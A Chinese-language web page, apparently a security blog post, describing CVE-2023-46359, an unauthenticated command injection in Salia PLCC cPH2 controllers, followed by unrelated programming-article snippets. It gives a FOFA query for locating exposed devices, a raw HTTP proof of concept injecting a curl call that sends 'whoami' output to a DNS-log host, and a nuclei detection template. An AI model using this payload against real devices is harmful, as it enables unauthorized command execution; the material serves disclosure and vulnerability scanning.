当前位置：首页 > news >正文

Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359)

news 2026/2/7 11:10:03

漏洞描述

Salia PLCC cPH2 v1.87.0 及更早版本中存在一个操作系统命令注入漏洞，该漏洞可能允许未经身份验证的远程攻击者通过传递给连接检查功能的特制参数在系统上执行任意命令。

产品界面

fofa语法

"Salia PLCC"

POC

GET /connectioncheck.php?ip=127.0.0.1+%26%26+curl+http:%2F%2Fip.port.xxx.dnslog.pw/`whoami` HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0

nuclei验证

id: CVE-2023-46359
info:
name: Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359)
author: nobody
severity: critical
description: |
Salia PLCC cPH2 v1.87.0 及更早版本中存在一个操作系统命令注入漏洞，该漏洞可能允许未经身份验证的远程攻击者通过传递给连接检查功能的特制参数在系统上执行任意命令。
impact: |
攻击者可远程执行系统命令
remediation: |
升级版本，输入严格过滤
metadata:
verified: true
max-request: 3
fofa-query: "Salia PLCC"
tags: CVE-2023-46359
requests:
- raw:
- |
@timeout:20s
GET /connectioncheck.php?ip=127.0.0.1+%26%26+curl+curl+http:%2F%2F{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
name: dns
words:
- "dns"
- type: word
part: body
words:
- "SUCCESS"
- type: status
status:
- 200

修复建议

建议升级到最新版本
对输入传参做严格过滤
声明：⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤，任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的，否则后果⾃⾏承担。所有渗透都需获取授权！

Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359)

漏洞描述 Salia PLCC cPH2 v1.87.0 及更早版本中存在一个操作系统命令注入漏洞，该漏洞可能允许未经身份验证的远程攻击者通过传递给连接检查功能的特制参数在系统上执行任意命令。产品界面 fofa语法 "Salia PLCC" POC GET /connectioncheck.php?ip1…...

编程日记 2024/6/24 13:28:38

路由表操作

路由表（Routing Table）是网络设备（如计算机、路由器、交换机等）用来确定数据包传输路径的数据库。每当网络设备收到一个数据包时，它会查找路由表，决定将数据包转发到哪个网络接口或网关。下面介绍路由表的基…...

编程日记 2024/6/24 13:25:35

羊大师：拒绝心灵内耗：走向高效与平和

在繁忙的生活中，我们时常感到疲惫不堪，仿佛心灵被无形的枷锁束缚，这就是精神内耗。它让我们在思考、决策和行动中犹豫不决，消耗着我们的精力和时间，让我们无法专注于真正重要的事情。然而，我们有能力打破这…...

编程日记 2024/6/24 13:23:33

IOS Swift 从入门到精通：Swift 简介，Swift中变量和常量，Swift中字符串，Swift中整数和浮点数

文章目录为什么选择 Swift如何创建变量和常量如何创建变量和常量为什么 Swift 有常量和变量？如何创建字符串为什么 Swift 需要多行字符串？如何存储整数如何存储十进制数为什么选择 Swift 编程语言有很多，但我认为你会非常喜欢学习 Swift。这部分是出于实际原因——你可以在…...

编程日记 2024/6/24 13:22:32

聚焦AIoT最后一公里：EasyCVR+AI视频技术在各领域的创新应用

随着5G、AI、边缘计算、物联网（IoT）、云计算等技术的快速发展，万物互联已经从概念逐渐转变为现实，全新的行业生态AIoT正在开启新时代。巨大的市场潜力与AI等新兴技术不断融合形成的庞大市场缺口，深度场景化应用落地诉求…...

编程日记 2024/6/24 13:21:30

怎样利用 Groovy 的元编程特性来创建自定义的 DSL（领域特定语言）？

使用Groovy的元编程特性可以方便地创建自定义的领域特定语言（DSL）。下面是一些利用Groovy元编程特性创建DSL的步骤： 定义DSL的语法结构：首先，您需要确定DSL的语法结构，包括关键字、表达式和语句的格式等。可…...

编程日记 2024/6/24 13:19:29

自动预约申购 i茅台工具完善

自动预约申购茅台工具概述新的改变界面预览概述今天刷到一个windows自动刷茅台的工具，是用wpf实现的，看到作者最后是2023年更新的，评论中有好多人提出一些需求，刚才在学习wpf，就试着完善了一下。工具下载&#x…...

编程日记 2024/6/24 13:18:28

Jitter Injection详解

一、定义与作用 Jitter Injection，即抖动注入，是一种在通信系统中人为地添加抖动的技术。该技术通过在发送端对数据包进行延迟和抖动调整，以实现对整个通信系统的时延和抖动的控制。其主要作用包括： 改善传输质量：通…...

编程日记 2024/6/24 13:16:25

基于SSM+Jsp的校园餐厅管理

开发语言：Java框架：ssm技术：JSPJDK版本：JDK1.8服务器：tomcat7数据库：mysql 5.7（一定要5.7版本）数据库工具：Navicat11开发软件：eclipse/myeclipse/ideaMaven包…...

编程日记 2024/6/24 13:15:24

无线麦克风哪个品牌音质最好，一文告诉你无线领夹麦克风怎么挑选

随着直播带货和个人视频日志（Vlog）文化的兴起，以及自媒体内容创作的蓬勃发展，我们见证了麦克风行业的迅猛发展。在这一浪潮中，无线领夹麦克风以其无与伦比的便携性和操作效率，迅速赢得了广大视频制作者的喜…...

编程日记 2024/6/24 13:13:22

Docker配置国内镜像加速-2

Docker 官方镜像仓库（如 Docker Hub）可能由于网络原因，在某些地区或网络环境下下载速度较慢。使用镜像加速可以从距离用户更近、网络条件更好的镜像服务器获取镜像，从而显著提高下载速度，节省时间。 1.测试是否安装 d…...

编程日记 2024/6/24 13:12:20

前后端分离项目面试总结

一：是否登录状态服务端登录的时候，给分配一个session用于存储数据，同时将sessionID返回给浏览器，浏览器通过cookie把sessionID存储起来，下次访问时携带上，服务端就可以通过sessionID来确定用户是否登录。 …...

编程日记 2024/6/24 13:09:18

力扣刷题笔记

记录5-6月力扣刷题，持续刷题中~ 2024.05 15.三数之和双指针或者哈希表，注意去重的操作要考虑仔细 class Solution { public:vector<vector<int>> threeSum(vector<int>& nums) {vector<vector<int>> result;sort…...

编程日记 2024/6/24 13:06:15

【JS逆向百例】某点数据逆向分析，多方法详解

前言最近收到粉丝的私信，其在逆向某个站点时遇到了些问题，在查阅资料未果后，来询问K哥，K哥一向会尽力满足粉丝的需求。网上大多数分析该站点的教程已经不再适用，本文K哥将提供 3 种解决方案，对于 webpack…...

编程日记 2024/6/24 13:02:12

windows系统docker镜像导出

docker镜像导入导出(windows)_windowdocker下载镜像导出-CSDN博客https://blog.csdn.net/qq_22211217/article/details/93936363...

编程日记 2024/6/24 13:01:11

驱动地址： a. chromedriver:https://googlechromelabs.github.io/chrome-for-testing/ b. https://registry.npmmirror.com/binary.html?pathchromedriver/ selenium原理：Selenium 是一个用于自动化测试 Web 应用程序的工具集 a. 浏览器驱动&#xff0…...

编程日记 2024/6/24 13:00:10

[Python人工智能] 四十六.PyTorch入门 (1)环境搭建、神经网络普及和Torch基础知识

从本专栏开始，作者正式研究Python深度学习、神经网络及人工智能相关知识。前文讲解合如何利用keras和tensorflow构建基于注意力机制的CNN-BiLSTM-ATT-CRF模型，并实现中文实体识别研究。这篇文章将介绍PyTorch入门知识。前面我们的Python人工智能主要以TensorFlow和Keras为主，…...

编程日记 2024/6/24 12:59:09

示例:推荐一个应用Adorner做的通知和提示消息对话框

一、目的：在开发过程中，增加一些提示消息可以很好的提高用户体验，下面介绍一个用于增加提示消息的库二、效果如下可以看到右侧顶端弹出提示消息，消息间隔3s自动退出三、环境 VS2022 Net7 四、使用方式安装nuget包&#xff…...

编程日记 2024/6/24 12:58:07

nvdiadocker相关配置S3Gaussian

https://download.csdn.net/download/sinat_21699465/89458214 dockerfile文件参考： https://download.csdn.net/download/sinat_21699465/89458214 prework： 显卡驱动决定了cuda版本支持的上限。例如nvdia535驱动最高支持cuda12.2所以显卡驱动版本选…...

编程日记 2024/6/24 12:55:05

【科技前沿】电子设计新贵SmartEDA：为何它引领行业风潮？

在当今这个电子科技日新月异的时代，电子设计工具如同设计师的魔法棒，不断推动着产品创新的速度。而近期，一款名为SmartEDA的电子国产设计仿真软件异军突起，成为了行业内的新宠。那么，SmartEDA究竟有何过人之处&#xf…...

编程日记 2024/6/24 12:54:03

【kafka】Golang实现分布式Masscan任务调度系统

要求： 输出两个程序，一个命令行程序（命令行参数用flag）和一个服务端程序。命令行程序支持通过命令行参数配置下发IP或IP段、端口、扫描带宽，然后将消息推送到kafka里面。服务端程序： 从kafka消费者接收…...

编程新知 2026/2/4 19:38:41

脑机新手指南（八）：OpenBCI_GUI：从环境搭建到数据可视化（下）

一、数据处理与分析实战 （一）实时滤波与参数调整基础滤波操作 60Hz 工频滤波：勾选界面右侧 “60Hz” 复选框，可有效抑制电网干扰（适用于北美地区，欧洲用户可调整为 50Hz）。平滑处理&…...

编程新知 2025/11/19 22:56:53

Java如何权衡是使用无序的数组还是有序的数组

在 Java 中，选择有序数组还是无序数组取决于具体场景的性能需求与操作特点。以下是关键权衡因素及决策指南： ⚖️ 核心权衡维度维度有序数组无序数组查询性能二分查找 O(log n) ✅线性扫描 O(n) ❌插入/删除需移位维护顺序 O(n) ❌直接操作尾部 O(1) ✅内存开销与无序数组相…...

编程新知 2025/8/3 11:17:37

【CSS position 属性】static、relative、fixed、absolute 、sticky详细介绍，多层嵌套定位示例

文章目录 ★ position 的五种类型及基本用法 ★ 一、position 属性概述二、position 的五种类型详解（初学者版） 1. static（默认值） 2. relative（相对定位） 3. absolute（绝对定位） 4. fixed（固定定位） 5. sticky（粘性定位）三、定位元素的层级关系（z-i…...

编程新知 2026/1/26 9:48:34